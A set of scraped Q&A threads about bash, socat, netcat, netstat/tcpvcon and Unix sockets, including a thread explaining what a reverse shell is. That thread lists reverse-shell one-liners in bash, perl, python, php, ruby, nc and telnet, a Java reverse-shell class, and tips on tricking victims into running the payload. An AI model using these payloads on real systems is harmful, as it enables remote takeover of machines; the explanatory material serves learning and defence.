where to send daemon optional output so it's readable - bash

My daemon has option
-r WhereShouldIOutputAdditionalData
daemon is listening on port 26542 and writes on the same port , I want additional data to output to 26542 as well, I tried using
-r /dev/tcp/
and it doesn't work, When I do
> /dev/tcp/
I get connection refused. Deamon that I use: vowpal_wabbit, machine learning library.Any ideas?

Per an unoffical man page at
I see
-r [ --raw_predictions ] arg File to output unnormalized predictions to
So I think the -r argument is expecting a sort of /path/to/logs/raw_preds.log argument.
With this, you'll have "captured the optional output so it is readable." You could open a separate window and use the dev/admins old friend tail -f /path/to/logs/raw_preds.log to see info as it is written to the file.
If you really want it all to appear on one port, (which isn't exactly clear from your question), you'd need a separate program that can multi-plex the outputs, AND has control of your required port number. Also you'll need to be concerned about correct order of output.

I'm sorry, what you want to do it's impossibile for two reasons:
First, bash cannot listen on a given TCP port.
For example you cannot write a TCP server daemon in plain bash (you could use netcat for that), you can only connect() to a TCP port in bash.
Also, it is impossibile to listen on the same TCP ip:port that is already in LISTEN state by another process.


Using Socat Listening Multiple Port (Port Range)

I have Socat command as follow :
socat -u TCP4-LISTEN:5000,reuseaddr,fork OPEN:/tmp/test1-2039-sip-i,creat,append
And I would like to modify to listen to many ports range, from port 10000 till 29999
What is the right command to fullfill that need?
yes, socat can only listen on one port at a time per instance so my amateur method for getting around this is is using an array in a bash script to open an instance of socat for each port I need to monitor. Doing this for thousands of ports isn't really practical, since while socat uses little resources when listening, running 20,000 instances of socat is impractical, but i've run 50 at a single time on a small SoC board. So name your defined ports in an array (ports that are actually used), then iterate through a bash array loop and spawn a few instances.
ports=( 23 24 25 443 80 )
for port in "${ports[#]}"; do
socat tcp-listen:$port,reuseaddr,fork open:/tmp/$port.txt,creat,append
This writes data coming in from the ports to "port number file".txt in /tmp, ie. 24.txt. If you get an error, it's because something else has bonded to the port already. Use inotifywatch to alert you when a file gets written to.
This question has been out here a while and it keeps coming up in my searches. So I decided to answer it.

How to display the port numbers of open connections for a specific process with tcpvcon.exe (Windows 10)?

I have both TCPView and Tcpvcon on my Windows 10 machine and I wonder how to get all the information (port numbers, etc.) displayed in TCPView in the output of the Tcpvcon program? TCPView has the process name, PID, protocol, remote address, remote port, etc. in its output to the GUI. Tcpvcon, on the other hand, only contains the process name, protocol, remote and local address. I would like to have all information that can be read in the TCPView GUI in the command line output of Tcpvcon (especially the port numbers). Tcpvcon seems to have only the three switches -a -c -n but no matter how I combine them, I do not reach my goal. Can anyone help me?
Below is a sample output when I use all three switches. In TCPView I see much more information about the specified process.
I was also very surprised that tcpvcon does not show port numbers (maybe we should ask Mark R. to add them ;-)
BUT you could use
netstat -a -o -n
or with an admin shell even
netstat -a -o -n -b
switches meaning:
-a ... Displays all active TCP connections and the TCP and UDP ports
on which the computer is listening.
-o ... Displays active TCP connections and includes the process ID (PID)
for each connection.
-n ... Displays active TCP connections, however, addresses and port numbers
are expressed numerically and no attempt is made to determine names.
-b ... Displays the executable involved in creating each connection or
listening port. (Note that this option can be time-consuming and
will fail unless you have sufficient permissions.)
To get all available switches just use netstat -? (there are other interesting ones) or https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netstat
Up until the 2011 release of TCPVCON, it used to show port info.
The newer versions don't any more.
If you could get your hand on version 2.54, you would be able to get port info.
Tested with tcpvcon-v2.34 (I couldn't find 2.54) and it shows the ports but it doesn't show the process, all conections appear as from System. Also TCPV6 and UDPV6 are missing.
This is an example:
C:\WINDOWS\system32>"C:\My Program Files\TCPView-v4.13\tcpvcon-v2.34.exe" -a -c
I correct myself. ASB was right.
I just got TCPView v2.54 and it does indeed show the application, the ports and also TCPV6 and UDPV6.
So I confirm that the "good" version is v2.54.
Tcpvcon.exe -a -c
TCPView v2.54 - TCP/UDP endpoint viewer
Copyright (C) 1998-2009 Mark Russinovich
Sysinternals - www.sysinternals.com
TCP,[System Process],0,TIME_WAIT,WXP-XXX:domain,localhost:62240
To display the port numbers (and the process names) you need the old v2.54 version of tcpvcon.exe
This SysinternalsSuite.zip Archive from the Wayback Machine contains this version:

How can I communicate with a unix socket using one connection in a bash script?

I want to read/write to a unix socket in a bash script, but only do it with one connection. All of the examples I've seen using nc say to open different socket connections for every read/write.
Is there a way to do it using one connection throughout the script for every read/write?
(nc only lets me communicate with the socket in a one shot manner)
Run the whole script with output redirected:
} | nc -U /tmp/cppLLRBT-socket
However, pipes are one-way, so you can do this for reading or writing, but not both.

What is a reverse shell? [closed]

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This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed last year.
The community reviewed whether to reopen this question last year and left it closed:
Original close reason(s) were not resolved
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Could someone explain in deep what is reverse shell about and in what cases are we supposed to use it?
I found this http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet regarding the same, what is the meaning of:
bash -i >& /dev/tcp/ 0>&1
It's a(n insecure) remote shell introduced by the target. That's the opposite of a "normal" remote shell, that is introduced by the source.
Let's try it with localhost instead of
Open two tabs in your terminal.
open TCP port 8080 and wait for a connection:
nc localhost -lp 8080
Open an interactive shell, and redirect the IO streams to a TCP socket:
bash -i >& /dev/tcp/localhost/8080 0>&1
bash -i "If the -i option is present, the shell is interactive."
>& "This special syntax redirects both, stdout and stderr to the specified target."
(argument for >&) /dev/tcp/localhost/8080 is a TCP client connection to localhost:8080.
0>&1 redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.
Cf. http://wiki.bash-hackers.org/syntax/redirection
Rejoice as you have a prompt in tab 1.
Now imagine not using localhost, but some remote IP.
In addition to the excellent answer by #Kay, the answer to your question why is it called reverse shell is because it is called reverse shell as opposed to a bind shell
Bind shell - attacker's machine acts as a client and victim's machine acts as a server opening up a communication port on the victim and waiting for the client to connect to it and then issue commands that will be remotely (with respect to the attacker) executed on the victim's machine. This would be only possible if the victim's machine has a public IP and is accessible over the internet (disregarding all firewall etc. for the sake of brevity).
Now what if the victim's machine is NATed and hence not directly reachable ? One possible solution - So what if the victim's machine is not reachable. My (attacker's) machine is reachable. So let me open a server at my end and let the victim connect to me. This is what a reverse shell is.
Reverse Shell - attacker's machine (which has a public IP and is reachable over the internet) acts as a server. It opens a communication channel on a port and waits for incoming connections. Victim's machine acts as a client and initiates a connection to the attacker's listening server.
This is exactly what is done by the following:
bash -i >& /dev/tcp/ 0>&1
Examples of reverse shells in various languages. Danger is a word.
bash shell
bash -i >& /dev/tcp/ 0>&1;
perl shell
perl -e 'use Socket;$i="";$p=10086;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
python shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",10086));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';
php shell
php -r '$sock=fsockopen("",10086);exec("/bin/sh -i <&3 >&3 2>&3");';
ruby shell
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("","10086");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end';
nc shell
nc -c /bin/sh 10086;
telnet shell
telnet 10086 | /bin/bash | telnet 10087; # Remember to listen on your machine also on port 4445/tcp; mknod test p ; telnet 10086 0<test | /bin/bash 1>test;
java jar shell
wget -O /tmp/revs1.jar;
java -jar /tmp/revs1.jar;
import java.io.IOException;
public class ReverseShell {
public static void main(String[] args) throws IOException, InterruptedException {
// TODO Auto-generated method stub
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
Reverse shell is getting the connection from the victim or target to your computer. You can think of, your computer (attacker) acts like a server and listens on port specified by him, now you make sure victim connects to you by sending syn packet ( depends on reverse shell implementation whether it is implemented using tcp or udp principals). Now connection appears as if victim himself intending to connect us.
Now in order to trick the victim you need to perform social engineering attacks or do dns spoofing and make sure your victim runs the program.
A successful reverse shell would bypass all firewalls - both host based and network based firewalls.
Reverse shell are of different types - tcp based or http based or reverse tcp based or udp based reverse shells.
bash -i >& /dev/tcp/ 0>&1
To open a socket in Linux you have dev /tcp. You are basically opening tcp socket in Linux.
General format is /dev/tcp/ip address /port.
Now listen to port 8080 using net cat as
nc - l - p 8080 - - vv
A simple bash based reverse shell would be executing following command on the victim
nc - e /bin/bash 8080. It means you are asking vict to connect to your ip address on port 8080 assuming is victims ip.
In general a reverse shell is a payload that functions as a shell to the operating system, this means means that it either uses the OS API directly, or indirectly through spawning shells in the background, to perform read / write operations on the target computer's memory and hardware. If you can get the payload on to the target computer and get them to execute it, it can connect to the attacker IP and spawn a thread that waits on the port for the attacker to send a command over some protocol like http; it then can parse the command and use the OS API to perform the operation and send status back to the attacker, or it could spawn a shell in the background with the command as a command line argument and redirect the output to a file, which it can then read and send back to the attacker.
The common example you see is the payload using the OS API to spawn a shell process and supplies a command line that opens a child shell and redirects the stdin / stdout of the shell itself to network sockets.
So how normal hacking works is you try to connect to your target and hack through there,
a reverse shell is when your target connects to the attacker by a payload or something alike
there is a good tutorial on network chuck
a reverse shell is also a basic form of rat

How can I tell what host a packet comes from using netcat?

I'm trying to write a server using netcat and bash. to recieve asynchronous packets, i'm using the command
netcat -lu 6791
How can I tell what host a packet came from? Is there a better tool i should be using then netcat (socat maybe?)
wireshark (GUI tool), tshark (text-based version of wireshark), and/or tcpdump (very similar to tshark, at least until you start messing with filtering out specific packets or searching for certain patterns or anything more complex) come immediately to mind...
#twalberg's suggestion,
netcat -vv -lu -p 6791 worked.
